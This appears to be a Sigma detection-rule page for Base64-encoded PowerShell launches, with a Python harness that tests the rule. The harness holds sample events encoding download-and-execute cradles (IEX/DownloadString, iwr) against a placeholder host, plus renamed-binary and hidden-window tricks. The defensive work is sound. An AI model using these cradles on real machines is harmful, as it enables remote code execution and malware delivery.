Sigma rule · Level: high · Hunting
Suspicious Encoded PowerShell Command Line
Detects suspicious PowerShell process starts whose command line carries a Base64-encoded command (e.g. Emotet)
Detection Query
selection_img:
    - Image|endswith:
        - '\powershell.exe'
        - '\pwsh.exe'
    - OriginalFileName:
        - 'PowerShell.EXE'
        - 'pwsh.dll'
selection_cli_enc:
    CommandLine|contains: ' -e'
selection_cli_content:
    CommandLine|contains:
        - ' JAB'
        - ' SUVYI'
        - ' SQBFAFgA'
        - ' aQBlAHgA'
        - ' aWV4I'
        - ' IAA'
        - ' IAB'
        - ' UwB'
        - ' cwB'
selection_standalone:
    CommandLine|contains:
        - '.exe -ENCOD '
        - ' BA^J e-'
filter_optional_remote_signed:
    CommandLine|contains: ' -ExecutionPolicy remotesigned '
condition: selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*
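The Python below is an added illustration, not part of the rule or of the Sigma project: it transcribes the condition above field by field and runs it over constructed process-creation events (Sysmon-style Image / OriginalFileName / CommandLine, none of them real telemetry). It also shows where the odd-looking content markers come from: -EncodedCommand takes Base64 over UTF-16LE text, so a script that begins with `$` always encodes to `JAB`, `IEX` to `SQBFAFgA`, `iex` to `aQBlAHgA`, a leading space to `IAA`/`IAB`, `S`/`s` to `UwB`/`cwB`; `SUVYI` and `aWV4I` are the single-byte (ASCII) encodings of `IEX ` and `iex `. Sigma string matching is case-insensitive by default, so the comparisons lower-case both sides. Paths, script bodies and the example.invalid host are made up for the demonstration.

```python
import base64

# Rule ca2092a1-c273-4878-9b4b-0d60115bf5ea, transcribed selection by selection.
IMAGE_SUFFIXES = ("\\powershell.exe", "\\pwsh.exe")
ORIGINAL_FILENAMES = ("PowerShell.EXE", "pwsh.dll")
CLI_ENC = (" -e",)  # covers -e, -en, -enc, -EncodedCommand (and -ExecutionPolicy)
CLI_CONTENT = (" JAB", " SUVYI", " SQBFAFgA", " aQBlAHgA", " aWV4I",
               " IAA", " IAB", " UwB", " cwB")
STANDALONE = (".exe -ENCOD ", " BA^J e-")  # second one is a reversed command line
FILTER_OPTIONAL = (" -ExecutionPolicy remotesigned ",)


def _contains(value, needles):
    # Sigma 'contains' is case-insensitive unless the |cased modifier is used
    v = value.lower()
    return any(n.lower() in v for n in needles)


def _endswith(value, suffixes):
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def matches(event):
    """Evaluate the rule condition against one process-creation event (a dict)."""
    image = event.get("Image", "")
    orig = event.get("OriginalFileName", "")
    cmd = event.get("CommandLine", "")

    selection_img = (_endswith(image, IMAGE_SUFFIXES)
                     or any(orig.lower() == n.lower() for n in ORIGINAL_FILENAMES))
    selection_cli_enc = _contains(cmd, CLI_ENC)
    selection_cli_content = _contains(cmd, CLI_CONTENT)
    selection_standalone = _contains(cmd, STANDALONE)
    filter_optional = _contains(cmd, FILTER_OPTIONAL)

    # condition: selection_img and (all of selection_cli_* or selection_standalone)
    #            and not 1 of filter_optional_*
    return (selection_img
            and ((selection_cli_enc and selection_cli_content) or selection_standalone)
            and not filter_optional)


def encoded_command(script, encoding="utf-16-le"):
    """Encode a script the way -EncodedCommand expects: Base64 over UTF-16LE.
    encoding="ascii" reproduces the single-byte variants the rule also lists."""
    return base64.b64encode(script.encode(encoding)).decode("ascii")


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample events for the demonstration (not real logs).
SAMPLE_EVENTS = {
    # Loader style seen with Emotet: hidden window, script starts with '$' -> ' JAB'
    "emotet_style": {
        "Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell -nop -w hidden -e " + encoded_command(
            "$wc = New-Object Net.WebClient; $wc.DownloadString('http://example.invalid/a')")},
    # Download cradle with the full flag name; UTF-16LE 'IEX' -> ' SQBFAFgA'
    "iex_cradle": {
        "Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": PS + " -ExecutionPolicy Bypass -EncodedCommand " + encoded_command(
            "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')")},
    # Renamed binary: Image misses, but OriginalFileName from the PE header still hits
    "renamed_binary": {
        "Image": "C:\\Users\\Public\\svc.exe", "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "svc.exe -enc " + encoded_command("iex (iwr http://example.invalid/c)")},
    # Truncated flag spelling; script starts with 'W', so no content marker, but
    # '.exe -ENCOD ' is a standalone indicator
    "encod_prefix": {
        "Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": PS + " -ENCOD " + encoded_command("Write-Host hello")},
    # Legitimate script: '-ExecutionPolicy' satisfies ' -e', but nothing is encoded
    "benign_script": {
        "Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": PS + " -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
    # Encoded payload plus the string the optional filter excludes -> suppressed
    "filtered_remotesigned": {
        "Image": PS, "OriginalFileName": "PowerShell.EXE",
        "CommandLine": PS + " -ExecutionPolicy remotesigned -e "
                       + encoded_command("$wc = New-Object Net.WebClient")},
    # Not PowerShell at all
    "other_image": {
        "Image": "C:\\Windows\\System32\\cmd.exe", "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd.exe /c echo -e JAB"},
}


def evaluate(events=SAMPLE_EVENTS):
    """Run the rule over every sample event and return {name: matched}."""
    return {name: matches(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, hit in evaluate().items():
        print(f"{'ALERT ' if hit else 'ignore'}  {name}")
```

Two things the run makes visible. The content markers only fire when the encoded script begins with one of a handful of characters, which is why `selection_standalone` exists and why decoding the Base64 in a follow-up rule is worth the effort. And the `filter_optional_` prefix follows the Sigma convention for a false-positive filter that a consumer may drop: as written, the same encoded payload is suppressed merely because ` -ExecutionPolicy remotesigned ` appears on the command line, so in an environment where that flag is not common it is safer to deploy the rule without the filter.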
Author
Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
Created
2018-09-03
Data Sources
Windows: Process Creation Events
Platforms
windows
Tags
attack.execution, attack.t1059.001
Raw Content
title: Suspicious Encoded PowerShell Command Line
id: ca2092a1-c273-4878-9b4b-0d60115bf5ea
status: test
description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
references:
- https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e
author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
date: 2018-09-03
modified: 2023-04-06
tags:
- attack.execution
- attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        - OriginalFileName:
            - 'PowerShell.EXE'
            - 'pwsh.dll'
    selection_cli_enc:
        CommandLine|contains: ' -e' # covers -en and -enc
    selection_cli_content:
        CommandLine|contains:
            - ' JAB'
            - ' SUVYI'
            - ' SQBFAFgA'
            - ' aQBlAHgA'
            - ' aWV4I'
            - ' IAA'
            - ' IAB'
            - ' UwB'
            - ' cwB'
    selection_standalone:
        CommandLine|contains:
            - '.exe -ENCOD '
            - ' BA^J e-' # Reversed
    filter_optional_remote_signed:
        CommandLine|contains: ' -ExecutionPolicy remotesigned '
    condition: selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*
level: high